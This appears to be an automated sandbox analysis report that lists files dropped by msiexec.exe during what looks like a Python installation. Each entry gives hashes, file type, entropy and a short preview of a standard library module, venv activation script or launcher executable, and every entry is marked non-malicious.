                                                                                                                                SHA-512:C7941F88B863CB6C0752C222E8A98C5D3AEBE4D93B2658F9B55B195B860C72FCACBEA157574B076F11366DED09334CB2CE47B474FFCD34BD926E3944C33F0C57
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest..from warnings import catch_warnings....from unittest.test.testmock.support import is_instance..from unittest.mock import MagicMock, Mock, patch, sentinel, mock_open, call........something = sentinel.Something..something_else = sentinel.SomethingElse......class SampleException(Exception): pass......class WithTest(unittest.TestCase):.... def test_with_statement(self):.. with patch('%s.something' % __name__, sentinel.Something2):.. self.assertEqual(something, sentinel.Something2, "unpatched").. self.assertEqual(something, sentinel.Something)...... def test_with_statement_exception(self):.. with self.assertRaises(SampleException):.. with patch('%s.something' % __name__, sentinel.Something2):.. self.assertEqual(something, sentinel.Something2, "unpatched").. raise SampleException().. self.assertEqual(something, sentinel.Something)...... def test_with_statement_as(self):.. with p
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5385
                                                                                                                                Entropy (8bit):4.545682810293851
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:LTe0jHqFDDP9IrrzzPlwwUhV6eDWyh07IFcynrIAJowVJluPzxgVaK+AJYsxgcU:TGxIPzTazHd6yCsxUAJoIJluP9gVamJk
                                                                                                                                MD5:5413745685C7C3F60F6B6E81BDE3AAC2
                                                                                                                                SHA1:BF63DC5423B693708877F84C86E800846E538897
                                                                                                                                SHA-256:D1218413DCA8C641DB891ED05FAB47F02404320BEA183E9063E511D3660F61DB
                                                                                                                                SHA-512:AC97AF3097EDC2E833B38470C42B3004F72EF3D4EA357A827907984AD0C83D0639B3BC7BAB096F136FDD074427E99969FF9A34993A6A0006C048E6C8D2ADF3B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Various utility functions."""....from collections import namedtuple, Counter..from os.path import commonprefix....__unittest = True...._MAX_LENGTH = 80.._PLACEHOLDER_LEN = 12.._MIN_BEGIN_LEN = 5.._MIN_END_LEN = 5.._MIN_COMMON_LEN = 5.._MIN_DIFF_LEN = _MAX_LENGTH - \.. (_MIN_BEGIN_LEN + _PLACEHOLDER_LEN + _MIN_COMMON_LEN +.. _PLACEHOLDER_LEN + _MIN_END_LEN)..assert _MIN_DIFF_LEN >= 0....def _shorten(s, prefixlen, suffixlen):.. skip = len(s) - prefixlen - suffixlen.. if skip > _PLACEHOLDER_LEN:.. s = '%s[%d chars]%s' % (s[:prefixlen], skip, s[len(s) - suffixlen:]).. return s....def _common_shorten_repr(*args):.. args = tuple(map(safe_repr, args)).. maxlen = max(map(len, args)).. if maxlen <= _MAX_LENGTH:.. return args.... prefix = commonprefix(args).. prefixlen = len(prefix).... common_len = _MAX_LENGTH - \.. (maxlen - prefixlen + _MIN_BEGIN_LEN + _PLACEHOLDER_LEN).. if common_len > _MIN_COMMON_LE
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2709
                                                                                                                                Entropy (8bit):4.616545724111743
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:vxZuQSkq88QydcJR+j/TQ8/qcISXacT207CXy2ravbTl5AJ:vx0QSkq8Jyj/TQ/cISKcT2cSobAJ
                                                                                                                                MD5:58C446B1AC6F29593716CECD86C2F155
                                                                                                                                SHA1:0ACEDCE795BD46D5B3FF709188DA90A8088C4AD9
                                                                                                                                SHA-256:F0552228F4BA56228595A7F263E39D43E01F83B498D3F2E83CDA4346B6A265DC
                                                                                                                                SHA-512:6B9AB139E2317405B305C056FAA8E667F616D4A2E831F79C285DAC7D491A1465032C1EFA8D4C8728F79A03CE17DABC8C4FBAECDB956604986507A9038AC9889C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Exception classes raised by urllib.....The base exception class is URLError, which inherits from OSError. It..doesn't define any behavior of its own, but is the base class for all..exceptions defined in this package.....HTTPError is an exception class that is also a valid HTTP response..instance. It behaves this way because HTTP protocol errors are valid..responses, with a status code, headers, and a body. In some contexts,..an application may want to handle an exception like a regular..response..."""....import urllib.response....__all__ = ['URLError', 'HTTPError', 'ContentTooShortError']......class URLError(OSError):.. # URLError is a sub-type of OSError, but it doesn't share any of.. # the implementation. need to override __init__ and __str__... # It sets self.args for compatibility with other OSError.. # subclasses, but args doesn't have the typical format with errno in.. # slot 0 and strerror in slot 1. This may be better than nothing... def __init__(self,
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):43736
                                                                                                                                Entropy (8bit):4.673461590309311
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:zSheRe+AP2AZ6pDVSenN/3vsjmErW63SMZ/dqH9ULcpPu2nGMDwzKiu4U5FRunxP:zShd+brlepZYeLg9D95FsnxP
                                                                                                                                MD5:937962B41E079EF1DEB3E7C061707FD3
                                                                                                                                SHA1:C6F6E9F0408D03B78826D251CDD0FA89BBCFE7A2
                                                                                                                                SHA-256:C67D2B43F44C7E56C40CAE5E0FA61D0805C157DD93408BD5392421B733B1F7C4
                                                                                                                                SHA-512:C9680C6FCA6386E354173A89AE669EDD2C6E6E03C90C360F1F6EF8198ED9CA9EA6ABC50325DA970690DF9B26E39DCC01F0D418A00ABC2C1C3A4C0FA5AF667B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Parse (absolute and relative) URLs.....urlparse module is based upon the following RFC specifications.....RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding..and L. Masinter, January 2005.....RFC 2732 : "Format for Literal IPv6 Addresses in URL's by R.Hinden, B.Carpenter..and L.Masinter, December 1999.....RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T...Berners-Lee, R. Fielding, and L. Masinter, August 1998.....RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zawinski, July 1998.....RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June..1995.....RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M...McCahill, December 1994....RFC 3986 is considered the current standard and any future changes to..urlparse module should conform with it. The urlparse module is..currently not entirely compliant with this RFC due to defacto..scenarios for parsing, and for backward compa
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):104770
                                                                                                                                Entropy (8bit):4.461589564175148
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:h2I8oMeTXItee6jWbSdYOt/su7pBtzQhjoJtW7OyjarA05WfJtwTJTL6KOS4DGlm:vMeTX4ee6jWbSd/t/su7pBtzQh0JtW7n
                                                                                                                                MD5:B95B03F4B050DA5CAA100A3E6DEE8981
                                                                                                                                SHA1:0A06E85BF29F52D95D2107ACAC7CF3E28B481DDD
                                                                                                                                SHA-256:CA9DF995C1FB06F2F43AC45BA3427FFE5320BAF66C97F4B60EA4884DF33F7B0D
                                                                                                                                SHA-512:9D292DAE80C912189F206F2650EAF3B81B2CF3B38C002F8B66CC3346290D210D17A074159D246DFBB1DF415C25F620C00EA6692E0FBF55BACC184FC1A38E3879
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""An extensible library for opening URLs using a variety of protocols....The simplest way to use this module is to call the urlopen function,..which accepts a string containing a URL or a Request object (described..below). It opens the URL and returns the results as file-like..object; the returned object has some extra methods described below.....The OpenerDirector manages a collection of Handler objects that do..all the actual work. Each Handler implements a particular protocol or..option. The OpenerDirector is a composite object that invokes the..Handlers needed to open the requested URL. For example, the..HTTPHandler performs HTTP GET and POST requests and deals with..non-error returns. The HTTPRedirectHandler automatically deals with..HTTP 301, 302, 303, 307, and 308 redirect errors, and the..HTTPDigestAuthHandler deals with digest authentication.....urlopen(url, data=None) -- Basic usage is the same as original..urllib. pass the url and optionally data to post to an HTTP UR
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2445
                                                                                                                                Entropy (8bit):4.431974454129167
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:r4BbvTGvQS07lPgWWdq9tsrdyW19ej5wkwBkvR:MBzaQS07lY5cjtWywkwBkZ
                                                                                                                                MD5:D531F0A30312F650F962EAA31652AEBB
                                                                                                                                SHA1:A565B2AB6F6A05F0681B62B5E2E77B9BC25D3683
                                                                                                                                SHA-256:3B79834FB777BCC3601B05C8A2BBFAB1A72BF99B10E5A5D2C20A7C3A4583D0CF
                                                                                                                                SHA-512:25BBA9683CC29296DD103473FBDC24CF7037FCC9736494DA749B3BB9A4189B108B2CDC586AEB923BF2B48D147FFBB306D073F2A1BB1430599B8AE74F6CB629E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Response classes used by urllib.....The base class, addbase, defines a minimal file-like interface,..including read() and readline(). The typical response object is an..addinfourl instance, which defines an info() method that returns..headers and a geturl() method that returns the url..."""....import tempfile....__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']......class addbase(tempfile._TemporaryFileWrapper):.. """Base class for addinfo and addclosehook. Is a good idea for garbage collection.""".... # XXX Add a method to expose the timeout on the underlying socket?.... def __init__(self, fp):.. super(addbase, self).__init__(fp, '<urllib response>', delete=False).. # Keep reference around as this was part of the original API... self.fp = fp.... def __repr__(self):.. return '<%s at %r whose fp = %r>' % (self.__class__.__name__,.. id(self), self.file).... def __enter__(self):..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9697
                                                                                                                                Entropy (8bit):4.15994740890475
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:LEvpw5Ct9tcVd/2/paTJqSXkkOFGAiRiH57f/ivoiqN9/qVRjmGSEBaL/KK8Wh/R:46Ct9tcVFTJqF7fOQoVVB0GK8WP3
                                                                                                                                MD5:A024DF2786691CF05997954F37178BE0
                                                                                                                                SHA1:617ACE96E03067AD58490972A1E2122885C19813
                                                                                                                                SHA-256:05CED87A4F681014F6A5BF7370680CDCE02B392A559832CB6D2AA2F910F7D5EB
                                                                                                                                SHA-512:FA3406801D1D39B9BFCF052A473F297E2782F19F18A5C24139E94088F5AAABC15D1EFE7269E4E7426E13DD4DA0BC92F0A9C661B3325CEE171E3C910EA6820793
                                                                                                                                Malicious:false
                                                                                                                                Preview:""" robotparser.py.... Copyright (C) 2000 Bastian Kleineidam.... You can choose between two licenses when using this package:.. 1) GNU GPLv2.. 2) PSF license for Python 2.2.... The robots.txt Exclusion Protocol is implemented as specified in.. http://www.robotstxt.org/norobots-rfc.txt.."""....import collections..import urllib.parse..import urllib.request....__all__ = ["RobotFileParser"]....RequestRate = collections.namedtuple("RequestRate", "requests seconds")......class RobotFileParser:.. """ This class provides a set of methods to read, parse and answer.. questions about a single robots.txt file..... """.... def __init__(self, url=''):.. self.entries = [].. self.sitemaps = [].. self.default_entry = None.. self.disallow_all = False.. self.allow_all = False.. self.set_url(url).. self.last_checked = 0.... def mtime(self):.. """Returns the time the robots.txt file was last fetched..... This i
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7232
                                                                                                                                Entropy (8bit):4.644841623242359
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:IqFD4C1j1e5e65PAKhQ3E2Q/N56npYv9EVBDgcDrkONFhnlO7c0pz:1zj1Qe8PAKQEH/6nSVEVve7c0pz
                                                                                                                                MD5:5F0769CCD970346A8BE67C0AFFB5DBB9
                                                                                                                                SHA1:C4E014D881F0072478150C31F59F2F6E09D21ACB
                                                                                                                                SHA-256:CF31BAD2FE137921112B2C4C29FA147398D0612E7B069C9B322FE839DDCFAD5C
                                                                                                                                SHA-512:51FC5665A1F9446F179878836B6E8201CDB40F4CC518488809E75492BABF657FD6DC64380962396A3797AABE3D047608C26E951DC8136EEFC6CA0B4E0825681D
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Copyright 1994 by Lance Ellinghouse..# Cathedral City, California Republic, United States of America...# All Rights Reserved..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Lance Ellinghouse..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# LANCE ELLINGHOUSE DISCLAIMS ALL WARRANTIES WITH REGARD TO..# THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND..# FITNESS, IN NO EVENT SHALL LANCE ELLINGHOUSE CENTRUM BE LIABLE..# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28152
                                                                                                                                Entropy (8bit):4.868971671484606
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:hq/PMU0Qc7A62XLCqXcpfi4D9rGcMyLNB/2TFbVjjh5:hq/Ph0QcUPX+qXcpfi7Zjh5
                                                                                                                                MD5:92E630D2CB2B096FF041B88E93D8917C
                                                                                                                                SHA1:09071B01FEECD19AAAAFC2223966CA3EFCEDA3F7
                                                                                                                                SHA-256:FF7CF224B50A8A00344B80B398C13EB339D496462A0D2EB546D22A0B82CDE926
                                                                                                                                SHA-512:6047582D7D7A5C11FBD9A1370BC1EB8758C31A9C6CC6C4DB887DE6BF5447F71704510EE8F493A4ED625A022E932809AF3C9B581BBD682DF1ED5C0E12C00F5149
                                                                                                                                Malicious:false
                                                                                                                                Preview:r"""UUID objects (universally unique identifiers) according to RFC 4122.....This module provides immutable UUID objects (class UUID) and the functions..uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5..UUIDs as specified in RFC 4122.....If all you want is a unique ID, you should probably call uuid1() or uuid4()...Note that uuid1() may compromise privacy since it creates a UUID containing..the computer's network address. uuid4() creates a random UUID.....Typical usage:.... >>> import uuid.... # make a UUID based on the host ID and current time.. >>> uuid.uuid1() # doctest: +SKIP.. UUID('a8098c1a-f86e-11da-bd1a-00112444be1e').... # make a UUID using an MD5 hash of a namespace UUID and a name.. >>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org').. UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e').... # make a random UUID.. >>> uuid.uuid4() # doctest: +SKIP.. UUID('16fd2706-8baf-433b-82eb-8c7fada847da').... # make a UUID using a SHA-1
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24917
                                                                                                                                Entropy (8bit):4.187470373802878
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:j0JuwHcBuY8juStpTcIY6Tb+M/DkLZ1X/xuU/XyG:j0o8lpQIjbr7kLDPxuU/XyG
                                                                                                                                MD5:7BCB985BADE64461F8CFC3A09902F5A8
                                                                                                                                SHA1:8EB4D8F83649413567A1741DBA6B8C1C4AFE4B26
                                                                                                                                SHA-256:494BB244D82C1E2BA161433020CFF71E2E08B9BD1F4144A9BF77906CD3544DFD
                                                                                                                                SHA-512:F27649162ABC42A7A32B25BE66887264190F15FF84A396B4D985C9505D551CB1F8F77D6CADE29AA9D5737306531FDACD55C3790814674E936DDF7C114712EC55
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Virtual environment (venv) package for Python. Based on PEP 405.....Copyright (C) 2011-2014 Vinay Sajip...Licensed to the PSF under a contributor agreement..."""..import logging..import os..import shutil..import subprocess..import sys..import sysconfig..import types......CORE_VENV_DEPS = ('pip', 'setuptools')..logger = logging.getLogger(__name__)......class EnvBuilder:.. """.. This class exists to allow virtual environment creation to be.. customized. The constructor parameters determine the builder's.. behaviour when called upon to create a virtual environment..... By default, the builder makes the system (global) site-packages dir.. *un*available to the created environment..... If invoked using the Python -m option, the default is to use copying.. on Windows platforms but symlinks elsewhere. If instantiated some.. other way, the default is to *not* use symlinks..... :param system_site_packages: If True, the system (global) site-packages..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):155
                                                                                                                                Entropy (8bit):4.391102855481543
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:JSn33FLYBc/RpxlqFF0iLdGMgdFNFsyFF8rDauuZ9WL3MF0OaMy:knFL6yxAFF0ioMMXh0rDahnY3PMy
                                                                                                                                MD5:C446A88879A21B85D92BD3F00F91D529
                                                                                                                                SHA1:1EDB68F622FF436F2F3384A1D6BBA9671094AE76
                                                                                                                                SHA-256:8996339F7F40EE973AC404F514792180F26CB2AFBA22AFCE53F82B842C487FE0
                                                                                                                                SHA-512:7C9FEFDC73BE7CD93F65E71E1E53AE06B7B639D494E5FE02A16553987A16ECE05F3EA552FB4DAB87DEA46378A812C6BFF0E333C504BB12C8049DA2953F71C020
                                                                                                                                Malicious:false
                                                                                                                                Preview:import sys..from . import main....rc = 1..try:.. main().. rc = 0..except Exception as e:.. print('Error: %s' % e, file=sys.stderr)..sys.exit(rc)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):24167
                                                                                                                                Entropy (8bit):6.023852752309965
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:GrY3dW52A9GQok6DD0VN6JNs8nDMxJRAg4J5vUkLB7Vw2b:TtsFGIV4Ns8nDMx8g4Jm+v
                                                                                                                                MD5:05EA98A45F41151E4B99243F37650978
                                                                                                                                SHA1:EDD2A1318034381C8EE5F57DF8B5046A3B580EAE
                                                                                                                                SHA-256:01145C00E7CED7F1ACA5F3FEE3924092F9A6DFA63A14D551F45CC2CB99A1359E
                                                                                                                                SHA-512:5AC7E0481A97629D5787FF4E0D3024665AF9684066C6B53FB73529ADB162E0DB1594D72EA3831F3B7A2277DBA6AED6A2E8D35020E9CFABA6D0CEE128498279C0
                                                                                                                                Malicious:false
                                                                                                                                Preview:<#...Synopsis..Activate a Python virtual environment for the current PowerShell session......Description..Pushes the python executable for a virtual environment to the front of the..$Env:PATH environment variable and sets the prompt to signify that you are..in a Python virtual environment. Makes use of the command line switches as..well as the `pyvenv.cfg` file values present in the virtual environment......Parameter VenvDir..Path to the directory that contains the virtual environment to activate. The..default value for this is the parent of the directory that the Activate.ps1..script is located within......Parameter Prompt..The prompt prefix to display when this virtual environment is activated. By..default, this prompt is the name of the virtual environment folder (VenvDir)..surrounded by parentheses and followed by a single space (ie. '(.venv) ')......Example..Activate.ps1..Activates the Python virtual environment that contains the Activate.ps1 script......Example..Activate.ps1 -Ver
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2078
                                                                                                                                Entropy (8bit):5.194903323046164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:v/ODQe+fFd75FEGtffoBr4e7JizzwcGtOm6IqUmtfv1:vmDN+fFd771tfGi3wcGtOmvq1tf9
                                                                                                                                MD5:08ECD7FC76BF2CDB2DD21ACB3FB19F40
                                                                                                                                SHA1:2A929ECE372907144026C790E45AD0EC3E95613E
                                                                                                                                SHA-256:7AEA2FD4C841A06442117A2EB2329E64DE44620FA05A52D42EBD0D5CC70BC574
                                                                                                                                SHA-512:3D843CBC6DAC59047059B5FC1B626A206CB66C4D288A5D01D30CBA0FA53B319682F33FD14F31888EFC9EC7C2841664E0027BE6A0C776E3CE6C535C70F3DF9E45
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This file must be used with "source bin/activate" *from bash*..# you cannot run it directly....deactivate () {.. # reset old environment variables.. if [ -n "${_OLD_VIRTUAL_PATH:-}" ] ; then.. PATH="${_OLD_VIRTUAL_PATH:-}".. export PATH.. unset _OLD_VIRTUAL_PATH.. fi.. if [ -n "${_OLD_VIRTUAL_PYTHONHOME:-}" ] ; then.. PYTHONHOME="${_OLD_VIRTUAL_PYTHONHOME:-}".. export PYTHONHOME.. unset _OLD_VIRTUAL_PYTHONHOME.. fi.... # This should detect bash and zsh, which have a hash command that must.. # be called to get it to forget past commands. Without forgetting.. # past commands the $PATH changes we made may not be respected.. if [ -n "${BASH:-}" -o -n "${ZSH_VERSION:-}" ] ; then.. hash -r 2> /dev/null.. fi.... if [ -n "${_OLD_VIRTUAL_PS1:-}" ] ; then.. PS1="${_OLD_VIRTUAL_PS1:-}".. export PS1.. unset _OLD_VIRTUAL_PS1.. fi.... unset VIRTUAL_ENV.. unset VIRTUAL_ENV_PROMPT.. if
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1007
                                                                                                                                Entropy (8bit):5.27514244588578
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:fcvSYpA9ii8AeCC50XVvKv21NaQ5gVbK9WNIFaOd5gnVVWi8AIX1o:fc6xbeCC+4e10xK9WGFa7tL
                                                                                                                                MD5:3F5B7CF6AFC3EBB7053DCA90FE8C0D49
                                                                                                                                SHA1:AE6802B186B991EE1D33F69CFC3C884D3C612915
                                                                                                                                SHA-256:107F9AE6646D42EC3E7DA7D40266699C76A6A1FB6837FF824D47114406DA5345
                                                                                                                                SHA-512:E97B8FDD6BCF1CBBD01897B5FA335C0B6A8DE26D998FC893F995DEEAF7EF60A38D9CA0678F35A83A56CDA7F31516DE341EEA42ACE90763414B6F94A3AA2DFCE5
                                                                                                                                Malicious:false
                                                                                                                                Preview:@echo off....rem This file is UTF-8 encoded, so we need to update the current code page while executing it..for /f "tokens=2 delims=:." %%a in ('"%SystemRoot%\System32\chcp.com"') do (.. set _OLD_CODEPAGE=%%a..)..if defined _OLD_CODEPAGE (.. "%SystemRoot%\System32\chcp.com" 65001 > nul..)....set VIRTUAL_ENV=__VENV_DIR__....if not defined PROMPT set PROMPT=$P$G....if defined _OLD_VIRTUAL_PROMPT set PROMPT=%_OLD_VIRTUAL_PROMPT%..if defined _OLD_VIRTUAL_PYTHONHOME set PYTHONHOME=%_OLD_VIRTUAL_PYTHONHOME%....set _OLD_VIRTUAL_PROMPT=%PROMPT%..set PROMPT=__VENV_PROMPT__%PROMPT%....if defined PYTHONHOME set _OLD_VIRTUAL_PYTHONHOME=%PYTHONHOME%..set PYTHONHOME=....if defined _OLD_VIRTUAL_PATH set PATH=%_OLD_VIRTUAL_PATH%..if not defined _OLD_VIRTUAL_PATH set _OLD_VIRTUAL_PATH=%PATH%....set PATH=%VIRTUAL_ENV%\__VENV_BIN_NAME__;%PATH%..set VIRTUAL_ENV_PROMPT=__VENV_PROMPT__....:END..if defined _OLD_CODEPAGE (.. "%SystemRoot%\System32\chcp.com" %_OLD_CODEPAGE% > nul.. set _OLD_CODEPAG
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):393
                                                                                                                                Entropy (8bit):4.756212294983625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:xWbCw/wCWk/3ow9/L91/FULWM0kiZNAmZQ:gQK3ow1HFUCw
                                                                                                                                MD5:CD761DDD8683F623C5A4B142142B4323
                                                                                                                                SHA1:84F7A952A5ACBD6C454F7F208E2B9A06C2AFA32E
                                                                                                                                SHA-256:FB53ED45866FEE40F01C907C1F67555A399F98361722D89120D05A2580E9E563
                                                                                                                                SHA-512:ADC7B18D801CF2B6E11E0E67C19890D09883AAB5C5D01C5FA6B688FDD730B98681446C51D5010F28C4356DFACDF64CB0ED265FFA9A9BF3FCD1F32CE14E30B01A
                                                                                                                                Malicious:false
                                                                                                                                Preview:@echo off....if defined _OLD_VIRTUAL_PROMPT (.. set "PROMPT=%_OLD_VIRTUAL_PROMPT%"..)..set _OLD_VIRTUAL_PROMPT=....if defined _OLD_VIRTUAL_PYTHONHOME (.. set "PYTHONHOME=%_OLD_VIRTUAL_PYTHONHOME%".. set _OLD_VIRTUAL_PYTHONHOME=..)....if defined _OLD_VIRTUAL_PATH (.. set "PATH=%_OLD_VIRTUAL_PATH%"..)....set _OLD_VIRTUAL_PATH=....set VIRTUAL_ENV=..set VIRTUAL_ENV_PROMPT=....:END..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):268152
                                                                                                                                Entropy (8bit):6.460195311787527
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:sZJsPeFfFKPNrOYZ63KuH9q08IrL5vYle:GJsPeFfFKPNpZykpI59
                                                                                                                                MD5:9DCE6A120D094E5C925B967C4BB36277
                                                                                                                                SHA1:1AB60840E8D8ED14619FAB2D1559F989F01F01A9
                                                                                                                                SHA-256:3052784F3683C2BBE95F59560EB311E75F1EAC7AA5476A91BBD9FE4D2AEF880A
                                                                                                                                SHA-512:20A7A4B8ECB1262ED730C8299AD0ADA2AD93327F0886E5FDEFC89564FF7510595EC53AC5AA88747E0548315C3037125D83756E3AE4D9A813CC553C12991C94DF
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a.a.a.y.b.a.y.d.9.a.y.e.a.*.d.a.*.e.a.*.b.a.y.`.a.`..a.$.i.a.$..a.$.c.a.Rich..a.........PE..d...^.Vc.........."....!.......................@..........................................`....................................................<.......`@...p..4.......x)...........b..T...........................pa..@............................................text............................... ..`.rdata..............................@..@.data................~..............@....pdata..4....p......................@..@_RDATA..\...........................@..@.rsrc...`@.......B..................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256384
                                                                                                                                Entropy (8bit):6.460513078524775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:BohJ3FJbk5jQXebPRhFbth9en2Je/+oX92XmbzzBSwMpdCq/IM8uIGf7/1t6qFx:WJ3FJbk5jZP3FhrenHzBSwMd7wvc
                                                                                                                                MD5:9386C7FFB682C69EADB492071138F495
                                                                                                                                SHA1:CD4CDA7C97645A9CE694F9543B989E5FB898BBE7
                                                                                                                                SHA-256:A4C297FC0B96651EBB71B15398025F80D1F6F592330792BA3EB01D9CD56F9F99
                                                                                                                                SHA-512:9B7C2EE269D6F6F33F8656D9E3958036B441246304DCE499E9ADA4C7DC844A8D4B42DEAFC5E1D25DC50D069393F0CE9CDC5765A7CA7B3393511D1DEFBA4F7D21
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K.Y.%.Y.%.Y.%..&.\.%.. ...%..!.S.%.. .q.%..!.J.%..&.P.%..$.P.%.Y.$.).%..-.X.%....X.%..'.X.%.RichY.%.................PE..d...^.Vc.........."....!............X..........@.....................................5....`..................................................W..P....p..@:...@...........)...........1..T............................0..@............................................text... ........................... ..`.rdata..T...........................@..@.data........p.......X..............@....pdata.......@.......d..............@..@_RDATA..\....`.......z..............@..@.rsrc...@:...p...<...|..............@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (324), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):961
                                                                                                                                Entropy (8bit):5.335301632014924
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:quK2b2uolsvaiRQbG2w5u090IRcAtfgHNeo29H1WHw8F5+m5oWkNiOyM1XxwmGYc:quK2CDlgaGQb5xAi0aHXRyyR0Dldqn
                                                                                                                                MD5:5B471F4D5339E9CF3202199B00EB3F54
                                                                                                                                SHA1:67064E12CBEBE41A1A85B6F88230CE6C1397C69C
                                                                                                                                SHA-256:AA5F8A40F42973B6F591981936C168B54FBE065B3EF8397A4D55A1CB9D9C65F0
                                                                                                                                SHA-512:CA09EFEEFEE9203DBF0798932DBDFD7578F821CD4B7A35E49830198CE48B66DEA62DD0BE16CEF52B792EEB306A7CBB723F3CAE6392E7633880CAA54542C4A7D6
                                                                                                                                Malicious:false
